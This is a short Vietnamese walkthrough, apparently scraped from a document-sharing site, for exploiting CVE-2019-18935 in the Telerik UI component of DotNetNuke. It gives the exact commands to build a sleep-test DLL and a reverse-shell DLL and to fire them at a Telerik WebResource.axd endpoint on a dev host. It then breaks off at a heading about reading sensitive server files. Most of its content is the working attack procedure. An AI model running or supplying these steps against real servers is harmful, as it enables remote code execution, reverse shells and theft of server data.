Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 5

Dotnetnuke Telerik Exploit

1. Các bước chạy khai thác lỗ hổng


1. Khởi tạo môi trường python: python -m venv env
2. Active môi trường: chạy file activate.bat trong thư mục /env/Scripts
3. Cài đặt các gói cần thiết cho việc khai thác
python -m pip install -r requirements.txt
4. Built file DLL từ file c
build-dll.bat sleep.c
5. Thực hiện khai thác lỗ hổng với việc để response trả về trong thời
gian 10 giây
python CVE-2019-18935.py -v 2013.02.0717.0 -p payloads/sleep-
2022060715331834-amd64.dll -u
dnndev.me:8088/Telerik.Web.UI.WebResource.axd?type=rau

2. Khai thác với revert shell


1. Sửa file c với IP và port cần kết nối đến
2. Build file DLL từ file c: build-dll.bat reverse-shell.c
3. Thực hiện chạy payload khai thác lỗ hổng
python CVE-2019-18935.py -v 2013.02.0717.0 -p payloads/reverse-
shell-2022060716181711-amd64.dll -u
http://dnndev.me:8088/Telerik.Web.UI.WebResource.axd?type=rau

Thực hiện chạy command trên server khai thác


Đọc file nhạy cảm trên server:

You might also like